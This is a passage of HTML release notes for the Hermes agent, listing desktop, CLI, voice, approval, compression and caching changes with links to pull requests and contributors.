<p><strong>The desktop app becomes a platform — artifacts, plugin SDK, quick entry</strong> — Hermes desktop now renders <strong>artifacts</strong>: versioned cards with sandboxed live preview in a right-rail viewer, so generated HTML/apps run safely next to the chat. A real <strong>plugin SDK</strong> landed with Kanban as its founding plugin, <code>ctx.download</code> for handing users files, floating pane placement, and multiple GUI windows. A global-hotkey <strong>quick-entry window</strong> captures a thought into any session from anywhere in your OS. The desktop stopped being a chat client and started being a workbench. (<a href="https://github.com/NousResearch/hermes-agent/pull/72345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72345/hovercard">#72345</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61173" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61173/hovercard">#61173</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74413/hovercard">#74413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72315" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72315/hovercard">#72315</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68259/hovercard">#68259</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73143" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73143/hovercard">#73143</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Hermes speaks Agent-to-Agent — A2A v1.0</strong> — A new bundled plugin implements the Agent-to-Agent protocol, so Hermes can discover, talk to, and be driven by other A2A-compatible agents. This closes issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033216787" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/514" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/514/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/514">#514</a> — one of the oldest open feature requests in the repo. If you're building multi-agent systems with heterogeneous stacks, Hermes now has a standard wire protocol for joining them. (<a href="https://github.com/NousResearch/hermes-agent/pull/77109" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77109/hovercard">#77109</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>CLI power-user wave</strong> — <code>!command</code> runs a shell command instantly without spending a model turn. <code>/init</code> scans your project and generates (or updates) an <code>AGENTS.md</code>. <code>/diff</code> shows staged/all/session changes from any surface, <code>/context</code> breaks down exactly what's filling your context window, <code>/focus</code> gives you a reduced-output view with hidden-line recovery, and Ctrl+S stashes a half-written prompt into a browsable panel. Plus <code>hermes import-agent</code> migrates your Claude Code or Codex CLI setup into Hermes in one command. (<a href="https://github.com/NousResearch/hermes-agent/pull/72257" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72257/hovercard">#72257</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72178" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72178/hovercard">#72178</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72240/hovercard">#72240</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72242" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72242/hovercard">#72242</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72302" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72302/hovercard">#72302</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72262/hovercard">#72262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72190/hovercard">#72190</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, several salvaging long-standing community PRs)</p>
</li>
<li>
<p><strong>Correct the agent mid-turn — redirects</strong> — If Hermes is heading the wrong way, you no longer have to <code>/stop</code> and re-explain. Type a correction while it works and the active turn is redirected: work in flight is preserved, the original prompt is kept, and the agent course-corrects with your new guidance. Paired with double-ESC draft discard and a composer undo stack, steering feels like editing, not restarting. (<a href="https://github.com/NousResearch/hermes-agent/pull/63104" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63104/hovercard">#63104</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72339" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72339/hovercard">#72339</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74736/hovercard">#74736</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Tools that fix themselves</strong> — A sweep of self-recovery upgrades means the agent wastes far fewer turns on tool friction: truncated terminal output spills to a file the agent can read back, <code>patch</code> detects already-applied edits and diagnoses whitespace mismatches, <code>write_file</code> verifies content on disk, searches that match nothing probe for near-misses and recover, and common failure classes come back with actionable hints. The default tool-calling iteration limit also jumped 90 → 500 — long autonomous runs stopped hitting an artificial wall. (<a href="https://github.com/NousResearch/hermes-agent/pull/77041" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77041/hovercard">#77041</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76998" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76998/hovercard">#76998</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77024/hovercard">#77024</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77055/hovercard">#77055</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77011" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77011/hovercard">#77011</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76992" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76992/hovercard">#76992</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72176" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72176/hovercard">#72176</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Compression that respects your conversation</strong> — Context compression got a deep overhaul: proactive tool-result pruning for large-window models, per-turn micro-compaction that amortizes the cost instead of one giant pause, a guaranteed N-user-message tail so recent conversation always survives, progress-aware timeouts that stop punishing slow summary models, and ghost-skill defense so a pruned skill can never silently haunt a session. Thresholds are now configurable per-model and in absolute tokens. Long sessions stay coherent and stop stalling. (<a href="https://github.com/NousResearch/hermes-agent/pull/70254" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70254/hovercard">#70254</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75345/hovercard">#75345</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70250/hovercard">#70250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71508/hovercard">#71508</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70275/hovercard">#70275</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, salvaging multiple community PRs)</p>
</li>
<li>
<p><strong>Smart approvals grow up</strong> — <code>hermes approvals suggest</code> mines your approval history into allowlist proposals, operators can customize the smart-approval policy, a consecutive-denial circuit breaker stops a misbehaving loop cold, and desktop pairing approvals are profile-correct with a proper surface to answer them from. Plus a new approval gate for docker/podman daemon-redirect commands. Less clicking "approve", without giving an inch of control. (<a href="https://github.com/NousResearch/hermes-agent/pull/72259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72259/hovercard">#72259</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72186/hovercard">#72186</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72203/hovercard">#72203</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74446" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74446/hovercard">#74446</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71092" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71092/hovercard">#71092</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Faster everywhere, again</strong> — Prompt caching now covers tool schemas on native Anthropic without history loss. <code>hermes -w</code> cold start dropped ~14s → ~1.8s, <code>hermes update</code> no-ops got 2–6s faster, heavy SDKs lazy-load off the import path, config reads stopped deep-copying (54× faster on the telemetry gate), and the desktop shipped a second 60fps wave — streaming cost independent of transcript length, drag at 60fps with five streaming tabs, idle CPU near zero in the background. (<a href="https://github.com/NousResearch/hermes-agent/pull/76032" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76032/hovercard">#76032</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71637" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71637/hovercard">#71637</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74218" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74218/hovercard">#74218</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74204/hovercard">#74204</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71835/hovercard">#71835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72346/hovercard">#72346</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75218" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75218/hovercard">#75218</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>New places to run and be reached</strong> — Buzz lands as a bundled gateway platform (Block's Nostr-based messenger, with native WebSocket transport and NIP-42 auth), the Vercel AI Gateway provider and Vercel Sandbox terminal backend return modernized, desktop gains an SSH remote-backend connection mode, and the Relay shipped four phases of parity — media, interactive prompts, thread lifecycle, typing indicators — plus HSP personal + org skill sync. (<a href="https://github.com/NousResearch/hermes-agent/pull/73610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73610/hovercard">#73610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73761/hovercard">#73761</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74518/hovercard">#74518</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68130/hovercard">#68130</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71300/hovercard">#71300</a>–<a href="https://github.com/NousResearch/hermes-agent/pull/71624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71624/hovercard">#71624</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66730/hovercard">#66730</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yoniebans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yoniebans">@yoniebans</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</p>
</li>
</ul>

<h2>🎙️ Voice &amp; Speech</h2>
<h3>Conversational voice</h3>
<ul>
<li>Streaming, conversational TTS with barge-in across all surfaces; clause-by-clause synthesis for CLI voice mode + gateway adapters (<a href="https://github.com/NousResearch/hermes-agent/pull/69511" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69511/hovercard">#69511</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73862" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73862/hovercard">#73862</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Voice chat UX polish — busy-aware silence, stop hint, thinking sounds, barge-in fix; full-duplex turn listener (interrupt by voice during generation AND playback) (<a href="https://github.com/NousResearch/hermes-agent/pull/74000" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74000/hovercard">#74000</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74223/hovercard">#74223</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>On-device wake words with open-vocabulary phrases + multi-profile voice routing; say "stop" to end voice chat hands-free on every surface (<a href="https://github.com/NousResearch/hermes-agent/pull/70509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70509/hovercard">#70509</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73106" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73106/hovercard">#73106</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73933" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73933/hovercard">#73933</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>The model is told when the user interrupts its spoken reply; desktop speaks the whole turn and idle-flushes held narration (<a href="https://github.com/NousResearch/hermes-agent/pull/69602" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69602/hovercard">#69602</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69936" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69936/hovercard">#69936</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>15-item CLI/TUI voice-mode UX and environment fix wave (<a href="https://github.com/NousResearch/hermes-agent/pull/73520" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73520/hovercard">#73520</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>TTS / STT infrastructure</h3>
<ul>
<li>Unified spoken-text preprocessing + speed/instructions/provider tool params; unified STT language resolution (fixes the wrong-language transcription class); global <code>stt.language</code> defaults to <code>en</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/73513" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73513/hovercard">#73513</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73067/hovercard">#73067</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73100" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73100/hovercard">#73100</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Fully configurable STT — <code>hermes tools</code> category, GUI toggle/matrix, dashboard dropdowns, setup status; OpenAI gpt-transcribe support (<a href="https://github.com/NousResearch/hermes-agent/pull/73910" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73910/hovercard">#73910</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73853" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73853/hovercard">#73853</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Platform-aware auto-TTS voice delivery (opus platforms, streamed/global gap, captions); inbound voice classification/routing for Feishu, DingTalk, LINE, QQ, Photon, WhatsApp, Weixin (<a href="https://github.com/NousResearch/hermes-agent/pull/73508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73508/hovercard">#73508</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73515/hovercard">#73515</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Command TTS/STT provider hardening — idle timeouts, env scrubbing, no-shell, path guards (<a href="https://github.com/NousResearch/hermes-agent/pull/73514" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73514/hovercard">#73514</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Sync per-sentence TTS synthesis pipelined with playback — the next sentence renders while the current one speaks (<a href="https://github.com/NousResearch/hermes-agent/pull/77355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77355/hovercard">#77355</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Discord voice PCM streams to ffmpeg stdin instead of a temp file (<a href="https://github.com/NousResearch/hermes-agent/pull/76970" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76970/hovercard">#76970</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Compression &amp; context</h3>
<ul>
<li>Proactive tool-result pruning for large-window models; per-turn micro-compaction; N-user tail guarantee (<code>compression.min_tail_user_messages</code>); bounded summarizer input with head+tail retention (<a href="https://github.com/NousResearch/hermes-agent/pull/70254" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70254/hovercard">#70254</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75345/hovercard">#75345</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70250/hovercard">#70250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70249" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70249/hovercard">#70249</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Ghost-skill defense — <code>[SKILL_PRUNED]</code> markers, protected prune, deterministic survival; progress-aware timeouts; lock-contended compression soft-defers instead of exhausting (<a href="https://github.com/NousResearch/hermes-agent/pull/70275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70275/hovercard">#70275</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71508/hovercard">#71508</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70285/hovercard">#70285</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-model threshold overrides; absolute token threshold (<code>compression.threshold_tokens</code>); opt-in idle-triggered compaction; opt-in progress notices; structured local logging for compression attempts (<a href="https://github.com/NousResearch/hermes-agent/pull/69339" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69339/hovercard">#69339</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69335" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69335/hovercard">#69335</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69360" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69360/hovercard">#69360</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70457/hovercard">#70457</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69338" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69338/hovercard">#69338</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Context-engine ABC grows <code>select_context()</code> + <code>on_turn_complete()</code> verbs (salvage of <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chaos-xxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chaos-xxl">@chaos-xxl</a>'s RFC work); engines can suppress or customize compaction status (<a href="https://github.com/NousResearch/hermes-agent/pull/70458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70458/hovercard">#70458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69859/hovercard">#69859</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Strict redaction applied at every compaction text boundary (<a href="https://github.com/NousResearch/hermes-agent/pull/69294" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69294/hovercard">#69294</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Prompt caching &amp; hot-path performance</h3>
<ul>
<li>Tool schemas cached on native Anthropic without history loss + consolidated cache-plan internals (<a href="https://github.com/NousResearch/hermes-agent/pull/76032" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76032/hovercard">#76032</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76067/hovercard">#76067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>DeepSeek prompt caching on OpenCode gateways; per-API-call token accounting off the turn thread; OpenAI wire client reused across sequential LLM calls; send-path tool-call canonicalization memoized (<a href="https://github.com/NousResearch/hermes-agent/pull/75886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75886/hovercard">#75886</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73359/hovercard">#73359</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73375" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73375/hovercard">#73375</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76880" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76880/hovercard">#76880</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
